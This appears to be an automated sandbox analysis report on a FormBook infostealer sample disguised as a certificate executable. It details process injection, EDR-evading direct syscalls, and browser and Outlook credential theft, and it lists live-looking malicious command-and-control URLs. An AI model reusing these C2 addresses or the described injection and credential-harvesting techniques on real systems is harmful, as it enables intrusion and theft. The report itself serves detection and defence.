            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE872 mov eax, dword ptr fs:[00000030h]1_2_037BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6870 mov eax, dword ptr fs:[00000030h]1_2_037C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760854 mov eax, dword ptr fs:[00000030h]1_2_03760854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734859 mov eax, dword ptr fs:[00000030h]1_2_03734859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03742840 mov ecx, dword ptr fs:[00000030h]1_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov ecx, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752835 mov eax, dword ptr fs:[00000030h]1_2_03752835
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008FA66C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E8189 SetUnhandledExceptionFilter,0_2_008E8189
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008E81AC

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtClose: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 5304Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CCE008Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FB106 LogonUserW,0_2_008FB106
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C3D19
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090411C SendInput,keybd_event,0_2_0090411C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009074BB mouse_event,0_2_009074BB
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"Jump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_008FA66C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009071FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_009071FA
            Source: Certificate 11-21AIS.exe, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144732637.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Certificate 11-21AIS.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144732637.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000002.4144407037.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000002.00000000.1747341640.0000000000F10000.00000002.00000001.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4144732637.0000000001A50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E65C4 cpuid 0_2_008E65C4
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0091091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0091091D
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0093B340 GetUserNameW,0_2_0093B340
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F1E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_008F1E8E
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008DDDC0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Certificate 11-21AIS.exeBinary or memory string: WIN_81
            Source: Certificate 11-21AIS.exeBinary or memory string: WIN_XP
            Source: Certificate 11-21AIS.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: Certificate 11-21AIS.exeBinary or memory string: WIN_XPe
            Source: Certificate 11-21AIS.exeBinary or memory string: WIN_VISTA
            Source: Certificate 11-21AIS.exeBinary or memory string: WIN_7
            Source: Certificate 11-21AIS.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00918C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00918C4F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0091923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0091923B

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560696 Sample: Certificate 11-21AIS.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 Certificate 11-21AIS.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 YpYSxBPTXgWuOtxBGIerqOSW.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 YpYSxBPTXgWuOtxBGIerqOSW.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49956, 49962, 49968 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 50020, 50021, 50022 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Certificate 11-21AIS.exe61%ReversingLabsWin32.Trojan.AutoitInject
            Certificate 11-21AIS.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.3xfootball.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=100%Avira URL Cloudmalware
            http://www.empowermedeco.com/fo8o/?Ml18S=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&nVb4=q2L0IduHqXQ8JBmp0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?nVb4=q2L0IduHqXQ8JBmp&Ml18S=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/100%Avira URL Cloudmalware
